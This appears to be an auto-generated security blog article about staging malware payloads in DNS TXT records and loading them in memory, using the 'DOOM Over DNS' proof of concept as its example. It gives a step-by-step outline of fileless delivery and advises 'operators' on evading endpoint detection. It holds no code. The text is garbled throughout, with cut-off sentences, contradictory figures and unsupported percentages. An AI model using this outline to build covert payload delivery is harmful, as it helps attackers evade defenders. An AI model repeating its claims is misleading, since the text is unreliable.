Serverless keyvalue stores exploit DNS TXT data

Storing 2,000 characters per query turns the global DNS infrastructure into a free, serverless key-value store. You will learn how threat actors exploit the lack of validation in TXT fields to stash Base64-encoded payloads, examine the architecture behind fetching entire programs without writing to disk, and witness a proof-of-concept executing Managed DOOM entirely through memory streams.

The rise of Encrypted Evasion complicates this environment further. As Digitrendz reports, the surging adoption of DNS over HTTPS and DNS over TLS forces organizations to rethink monitoring strategies, yet few inspect the historic contents of TXT records. While standard tunneling scripts often split data into 63-character chunks to fit label restrictions, sophisticated campaigns now push approximately 300 characters of encoded binary data per query, exploiting a protocol that resolves domains like grandmas-cookie-recipes. Com while hiding malware delivery.

This technique is trivially easy to set up because DNS remains one of the oldest and most trusted protocols on the internet. By treating public DNS zones as globally distributed storage, attackers can reassemble files at runtime, leaving no artifacts on the host filesystem. ## The Role of DNS TXT Records as a Serverless Key-Value Store

DNS TXT Records as Arbitrary Text Fields for Payload Storage

TXT DNS records function as unvalidated arbitrary text fields holding approximately 2,000 characters per entry. This protocol feature allows attackers to treat the global DNS infrastructure as a serverless key-value store for payload staging. Instead of downloading binaries directly, malware agents query specific domains to retrieve Base64 encoded chunks. These fragments are reassembled entirely in memory, bypassing disk-based forensic monitoring tools that rarely inspect historic TXT record contents. Approximately 90% of modern malware uses DNS during operation, yet security stacks often ignore this vector due to its perceived legitimacy.

Standard tunneling tools often limit chunks to 63 characters, yet this deployment maximized the 2,000-character capacity per record to minimize query volume. The limitation remains strict dependency on recursive resolver caching policies; aggressive TTL enforcement could fragment reassembly logic during execution. Unlike traditional malware dropping executables to disk, this method leaves zero forensic artifacts on the host drive, rendering standard EDR file-scan heuristics useless. Network defenders must inspect TXT record entropy rather than file hashes to detect such payloads . TXT DNS records support arbitrary text payloads while A records strictly enforce IP address formatting constraints. Attackers favor TXT records because they carry larger amounts of arbitrary data compared to A or AAAA types limited to numeric addresses. Standard DNS label chunks restrict data to 63 characters, forcing massive fragmentation for binary delivery. Storing a 1GB MP4 would require an estimated 670,000 TXT records, creating significant operational overhead despite the theoretical capacity.

Security teams often overlook historic contents of text fields during forensic analysis. This blind spot allows nuisance malware to act as a pilot for costlier threats if initial delivery goes undetected. The operational cost Should operators use DNS for payload delivery? Only if accepting the risk of global caching and potential data fragmentation outweighs the need for stealth.

In-Memory . Managed code execution bypasses disk I/O by invoking the CLR to load raw bytes directly into a memory buffer. This mechanism allows an agent to reconstruct a binary from sequential queries rather than downloading a single executable file. The process shifts the attack surface from file system scanners to network traffic analysis, as the payload exists only as transient memory streams.

1. The agent queries the attacker domain for encoded text fragments.
2. Scripts decode the chunks and concatenate them into a byte array.
3. The runtime reflects the assembly from this buffer without creating disk artifacts.

This approach exploits the ability of . NET assemblies to initialize from memory, a feature distinct from native executables requiring physical files.

Resolving 1,966 sequential TXT record queries requires 10 to 20 seconds before the PowerShell agent can concatenate Base64 chunks. The reconstruction workflow begins by iterating through numbered subdomains to retrieve text fragments, decoding each string, and appending the result to a expanding byte array. This aggregation happens entirely within the script's memory space, avoiding any interaction with the file system. A custom agent then pipes this complete buffer directly into the . NET runtime loader.

Operators must decide when to use memory-only execution based on the need to evade endpoint detection rather than network filtering. The mechanism involves an agent querying a command server to retrieve encoded fragments, then assembling them directly into a memory stream. This represents a significant trend shifting from downloading single malicious files to assembling malware from hundreds of innocuous-looking DNS queries Attackers frequently apply Hexadecimal encoding, appearing in 95% of such DNS attacks to obfuscate the reassembled binary structure. A malicious agent written in C or Go performs the reassembly. The limitation is that high-volume query patterns can trigger network anomaly alerts even if file scanners remain blind.

Managed-DOOM as a Pure C# Engine for Memory Execution

Adam Rice selected managed-doom because pure C# assemblies load from raw bytes, bypassing disk I/O entirely. Native executables require file system artifacts, but the . NET runtime accepts a MemoryStream directly via reflection. This architectural distinction enables the DOOM Over DNS project to execute complex binaries without writing a single byte to storage. The original engine code required patching to replace standard file path arguments with in-memory buffers. Removing native DLL dependencies was mandatory since Windows cannot reflect unmanaged libraries from.

Operators must recompile targets to ensure zero native dependencies remain in the binary. The publication details confirm that windowing libraries were replaced with direct Win32 API calls to satisfy this constraint. A significant limitation arises here: stripping audio and native wrappers reduces functionality to achieve stealth. Security teams monitoring file creation events will see nothing, shifting detection reliance to network flow analysis.

A 250-line PowerShell script resolves nearly 2,000 DNS queries to reconstruct the game engine entirely within RAM. This agent iterates through sequential subdomains, decoding text fragments and appending them to a expanding byte array before invoking the . NET loader. The process transforms standard network traffic into a reassembly mechanism Operators observe the WAD file shrink from 4MB to 1.7MB while the DLL bundle compresses from 4.4MB to 1.2MB during the initial upload phase. Uploading these compressed assets via the CloudFlare API consumed roughly 15 minutes of administrative time. The execution flow relies on patching the source to accept a memory stream rather than reading from disk file paths like `C:\Path\to\Game. Dll`. Native dependencies were stripped to ensure the managed-doom port runs as pure managed code without triggering Windows file locks. This DOOM Over DNS implementation proves that complex binaries can launch without a single byte touching storage. However, the requirement to strip audio and native windowing libraries limits the fidelity of executables deployed through this vector. Security teams face a dilemma where blocking large TXT queries disrupts legitimate email authentication records alongside malicious payloads.

Hosting the 1,966 TXT records required for this exploit demands a CloudFlare Pro DNS zone rather than free tiers. The author committed $20/month to avoid purchasing ten separate domains just to bypass record limits. This financial barrier creates a tangible threshold for attackers, shifting operations from zero-cost experiments to funded campaigns. Latency introduces a second constraint, as resolving thousands of queries consumes 10 to 20 seconds before execution begins. Such delays render the technique impractical for time-sensitive malware stages requiring instant callbacks.

Network defenders must recognize that running DOOM via DNS is not purely technical but also economic. The need for paid infrastructure filters out low-sophistication threats while enabling sustained, large-scale data exfiltration by well-funded groups.

RFC 1035 Design Intent Versus Modern DNS Tunneling Reality

RFC 1035 set a hostname resolver, not a storage array, creating a protocol mismatch attackers now exploit. The IETF drafted specifications 45 years ago without anticipating binary exfiltration via text fields. This architectural gap allows threat actors to treat DNS zones as distributed file systems. Iranian APT group OilRig The SUNBURST backdoor later validated this vector by embedding C2 logic within legitimate-looking DNS traffic during the SolarWinds incident. Modern malware frequently adopts hexadecimal encoding to fit binary data into standard label constraints. Researchers observed the Joke Screenmate Malware using this exact fragmentation technique in 2025 to evade signature scans. Traditional security stacks miss these payloads because they inspect files, not query streams. The cost of this blind spot is total visibility loss for memory-resident threats. Operators must shift focus from disk artifacts to query entropy analysis. Ignoring this vector leaves networks open to serverless payload delivery that bypasses every conventional firewall rule.

This operational shift prioritized TXT records over standard HTTP beams to evade perimeter inspection tools. The SUNBURST backdoor later adopted similar stealth mechanics during the 2020 SolarWinds compromise, embedding C2 logic within legitimate query streams. Such campaigns demonstrate that DNS tunneling functions as a reliable transport layer for state-sponsored espionage.

The DNSpionage campaign further illustrated this endurance by compromising registrar accounts for extended periods before discovery. Attackers increasingly favor this method because traditional antivirus solutions often ignore DNS payload assembly. A key tension exists between network performance monitoring and deep packet inspection; blocking large TXT responses risks breaking legitimate email authentication flows. Security teams must recognize that payload delivery via DNS bypasses standard file-based heuristics entirely. The evolution from simple exfiltration to complex binary staging represents a fundamental change in threat modeling. Operators should assume that any allowed DNS traffic could carry executable code segments.

Only if they accept that standard monitoring will miss the activity. The strategic implication demands a shift from file hashing to behavioral analysis of query patterns. InterLIR recommends auditing DNS zone traffic for high-volume TXT requests rather than waiting for disk writes.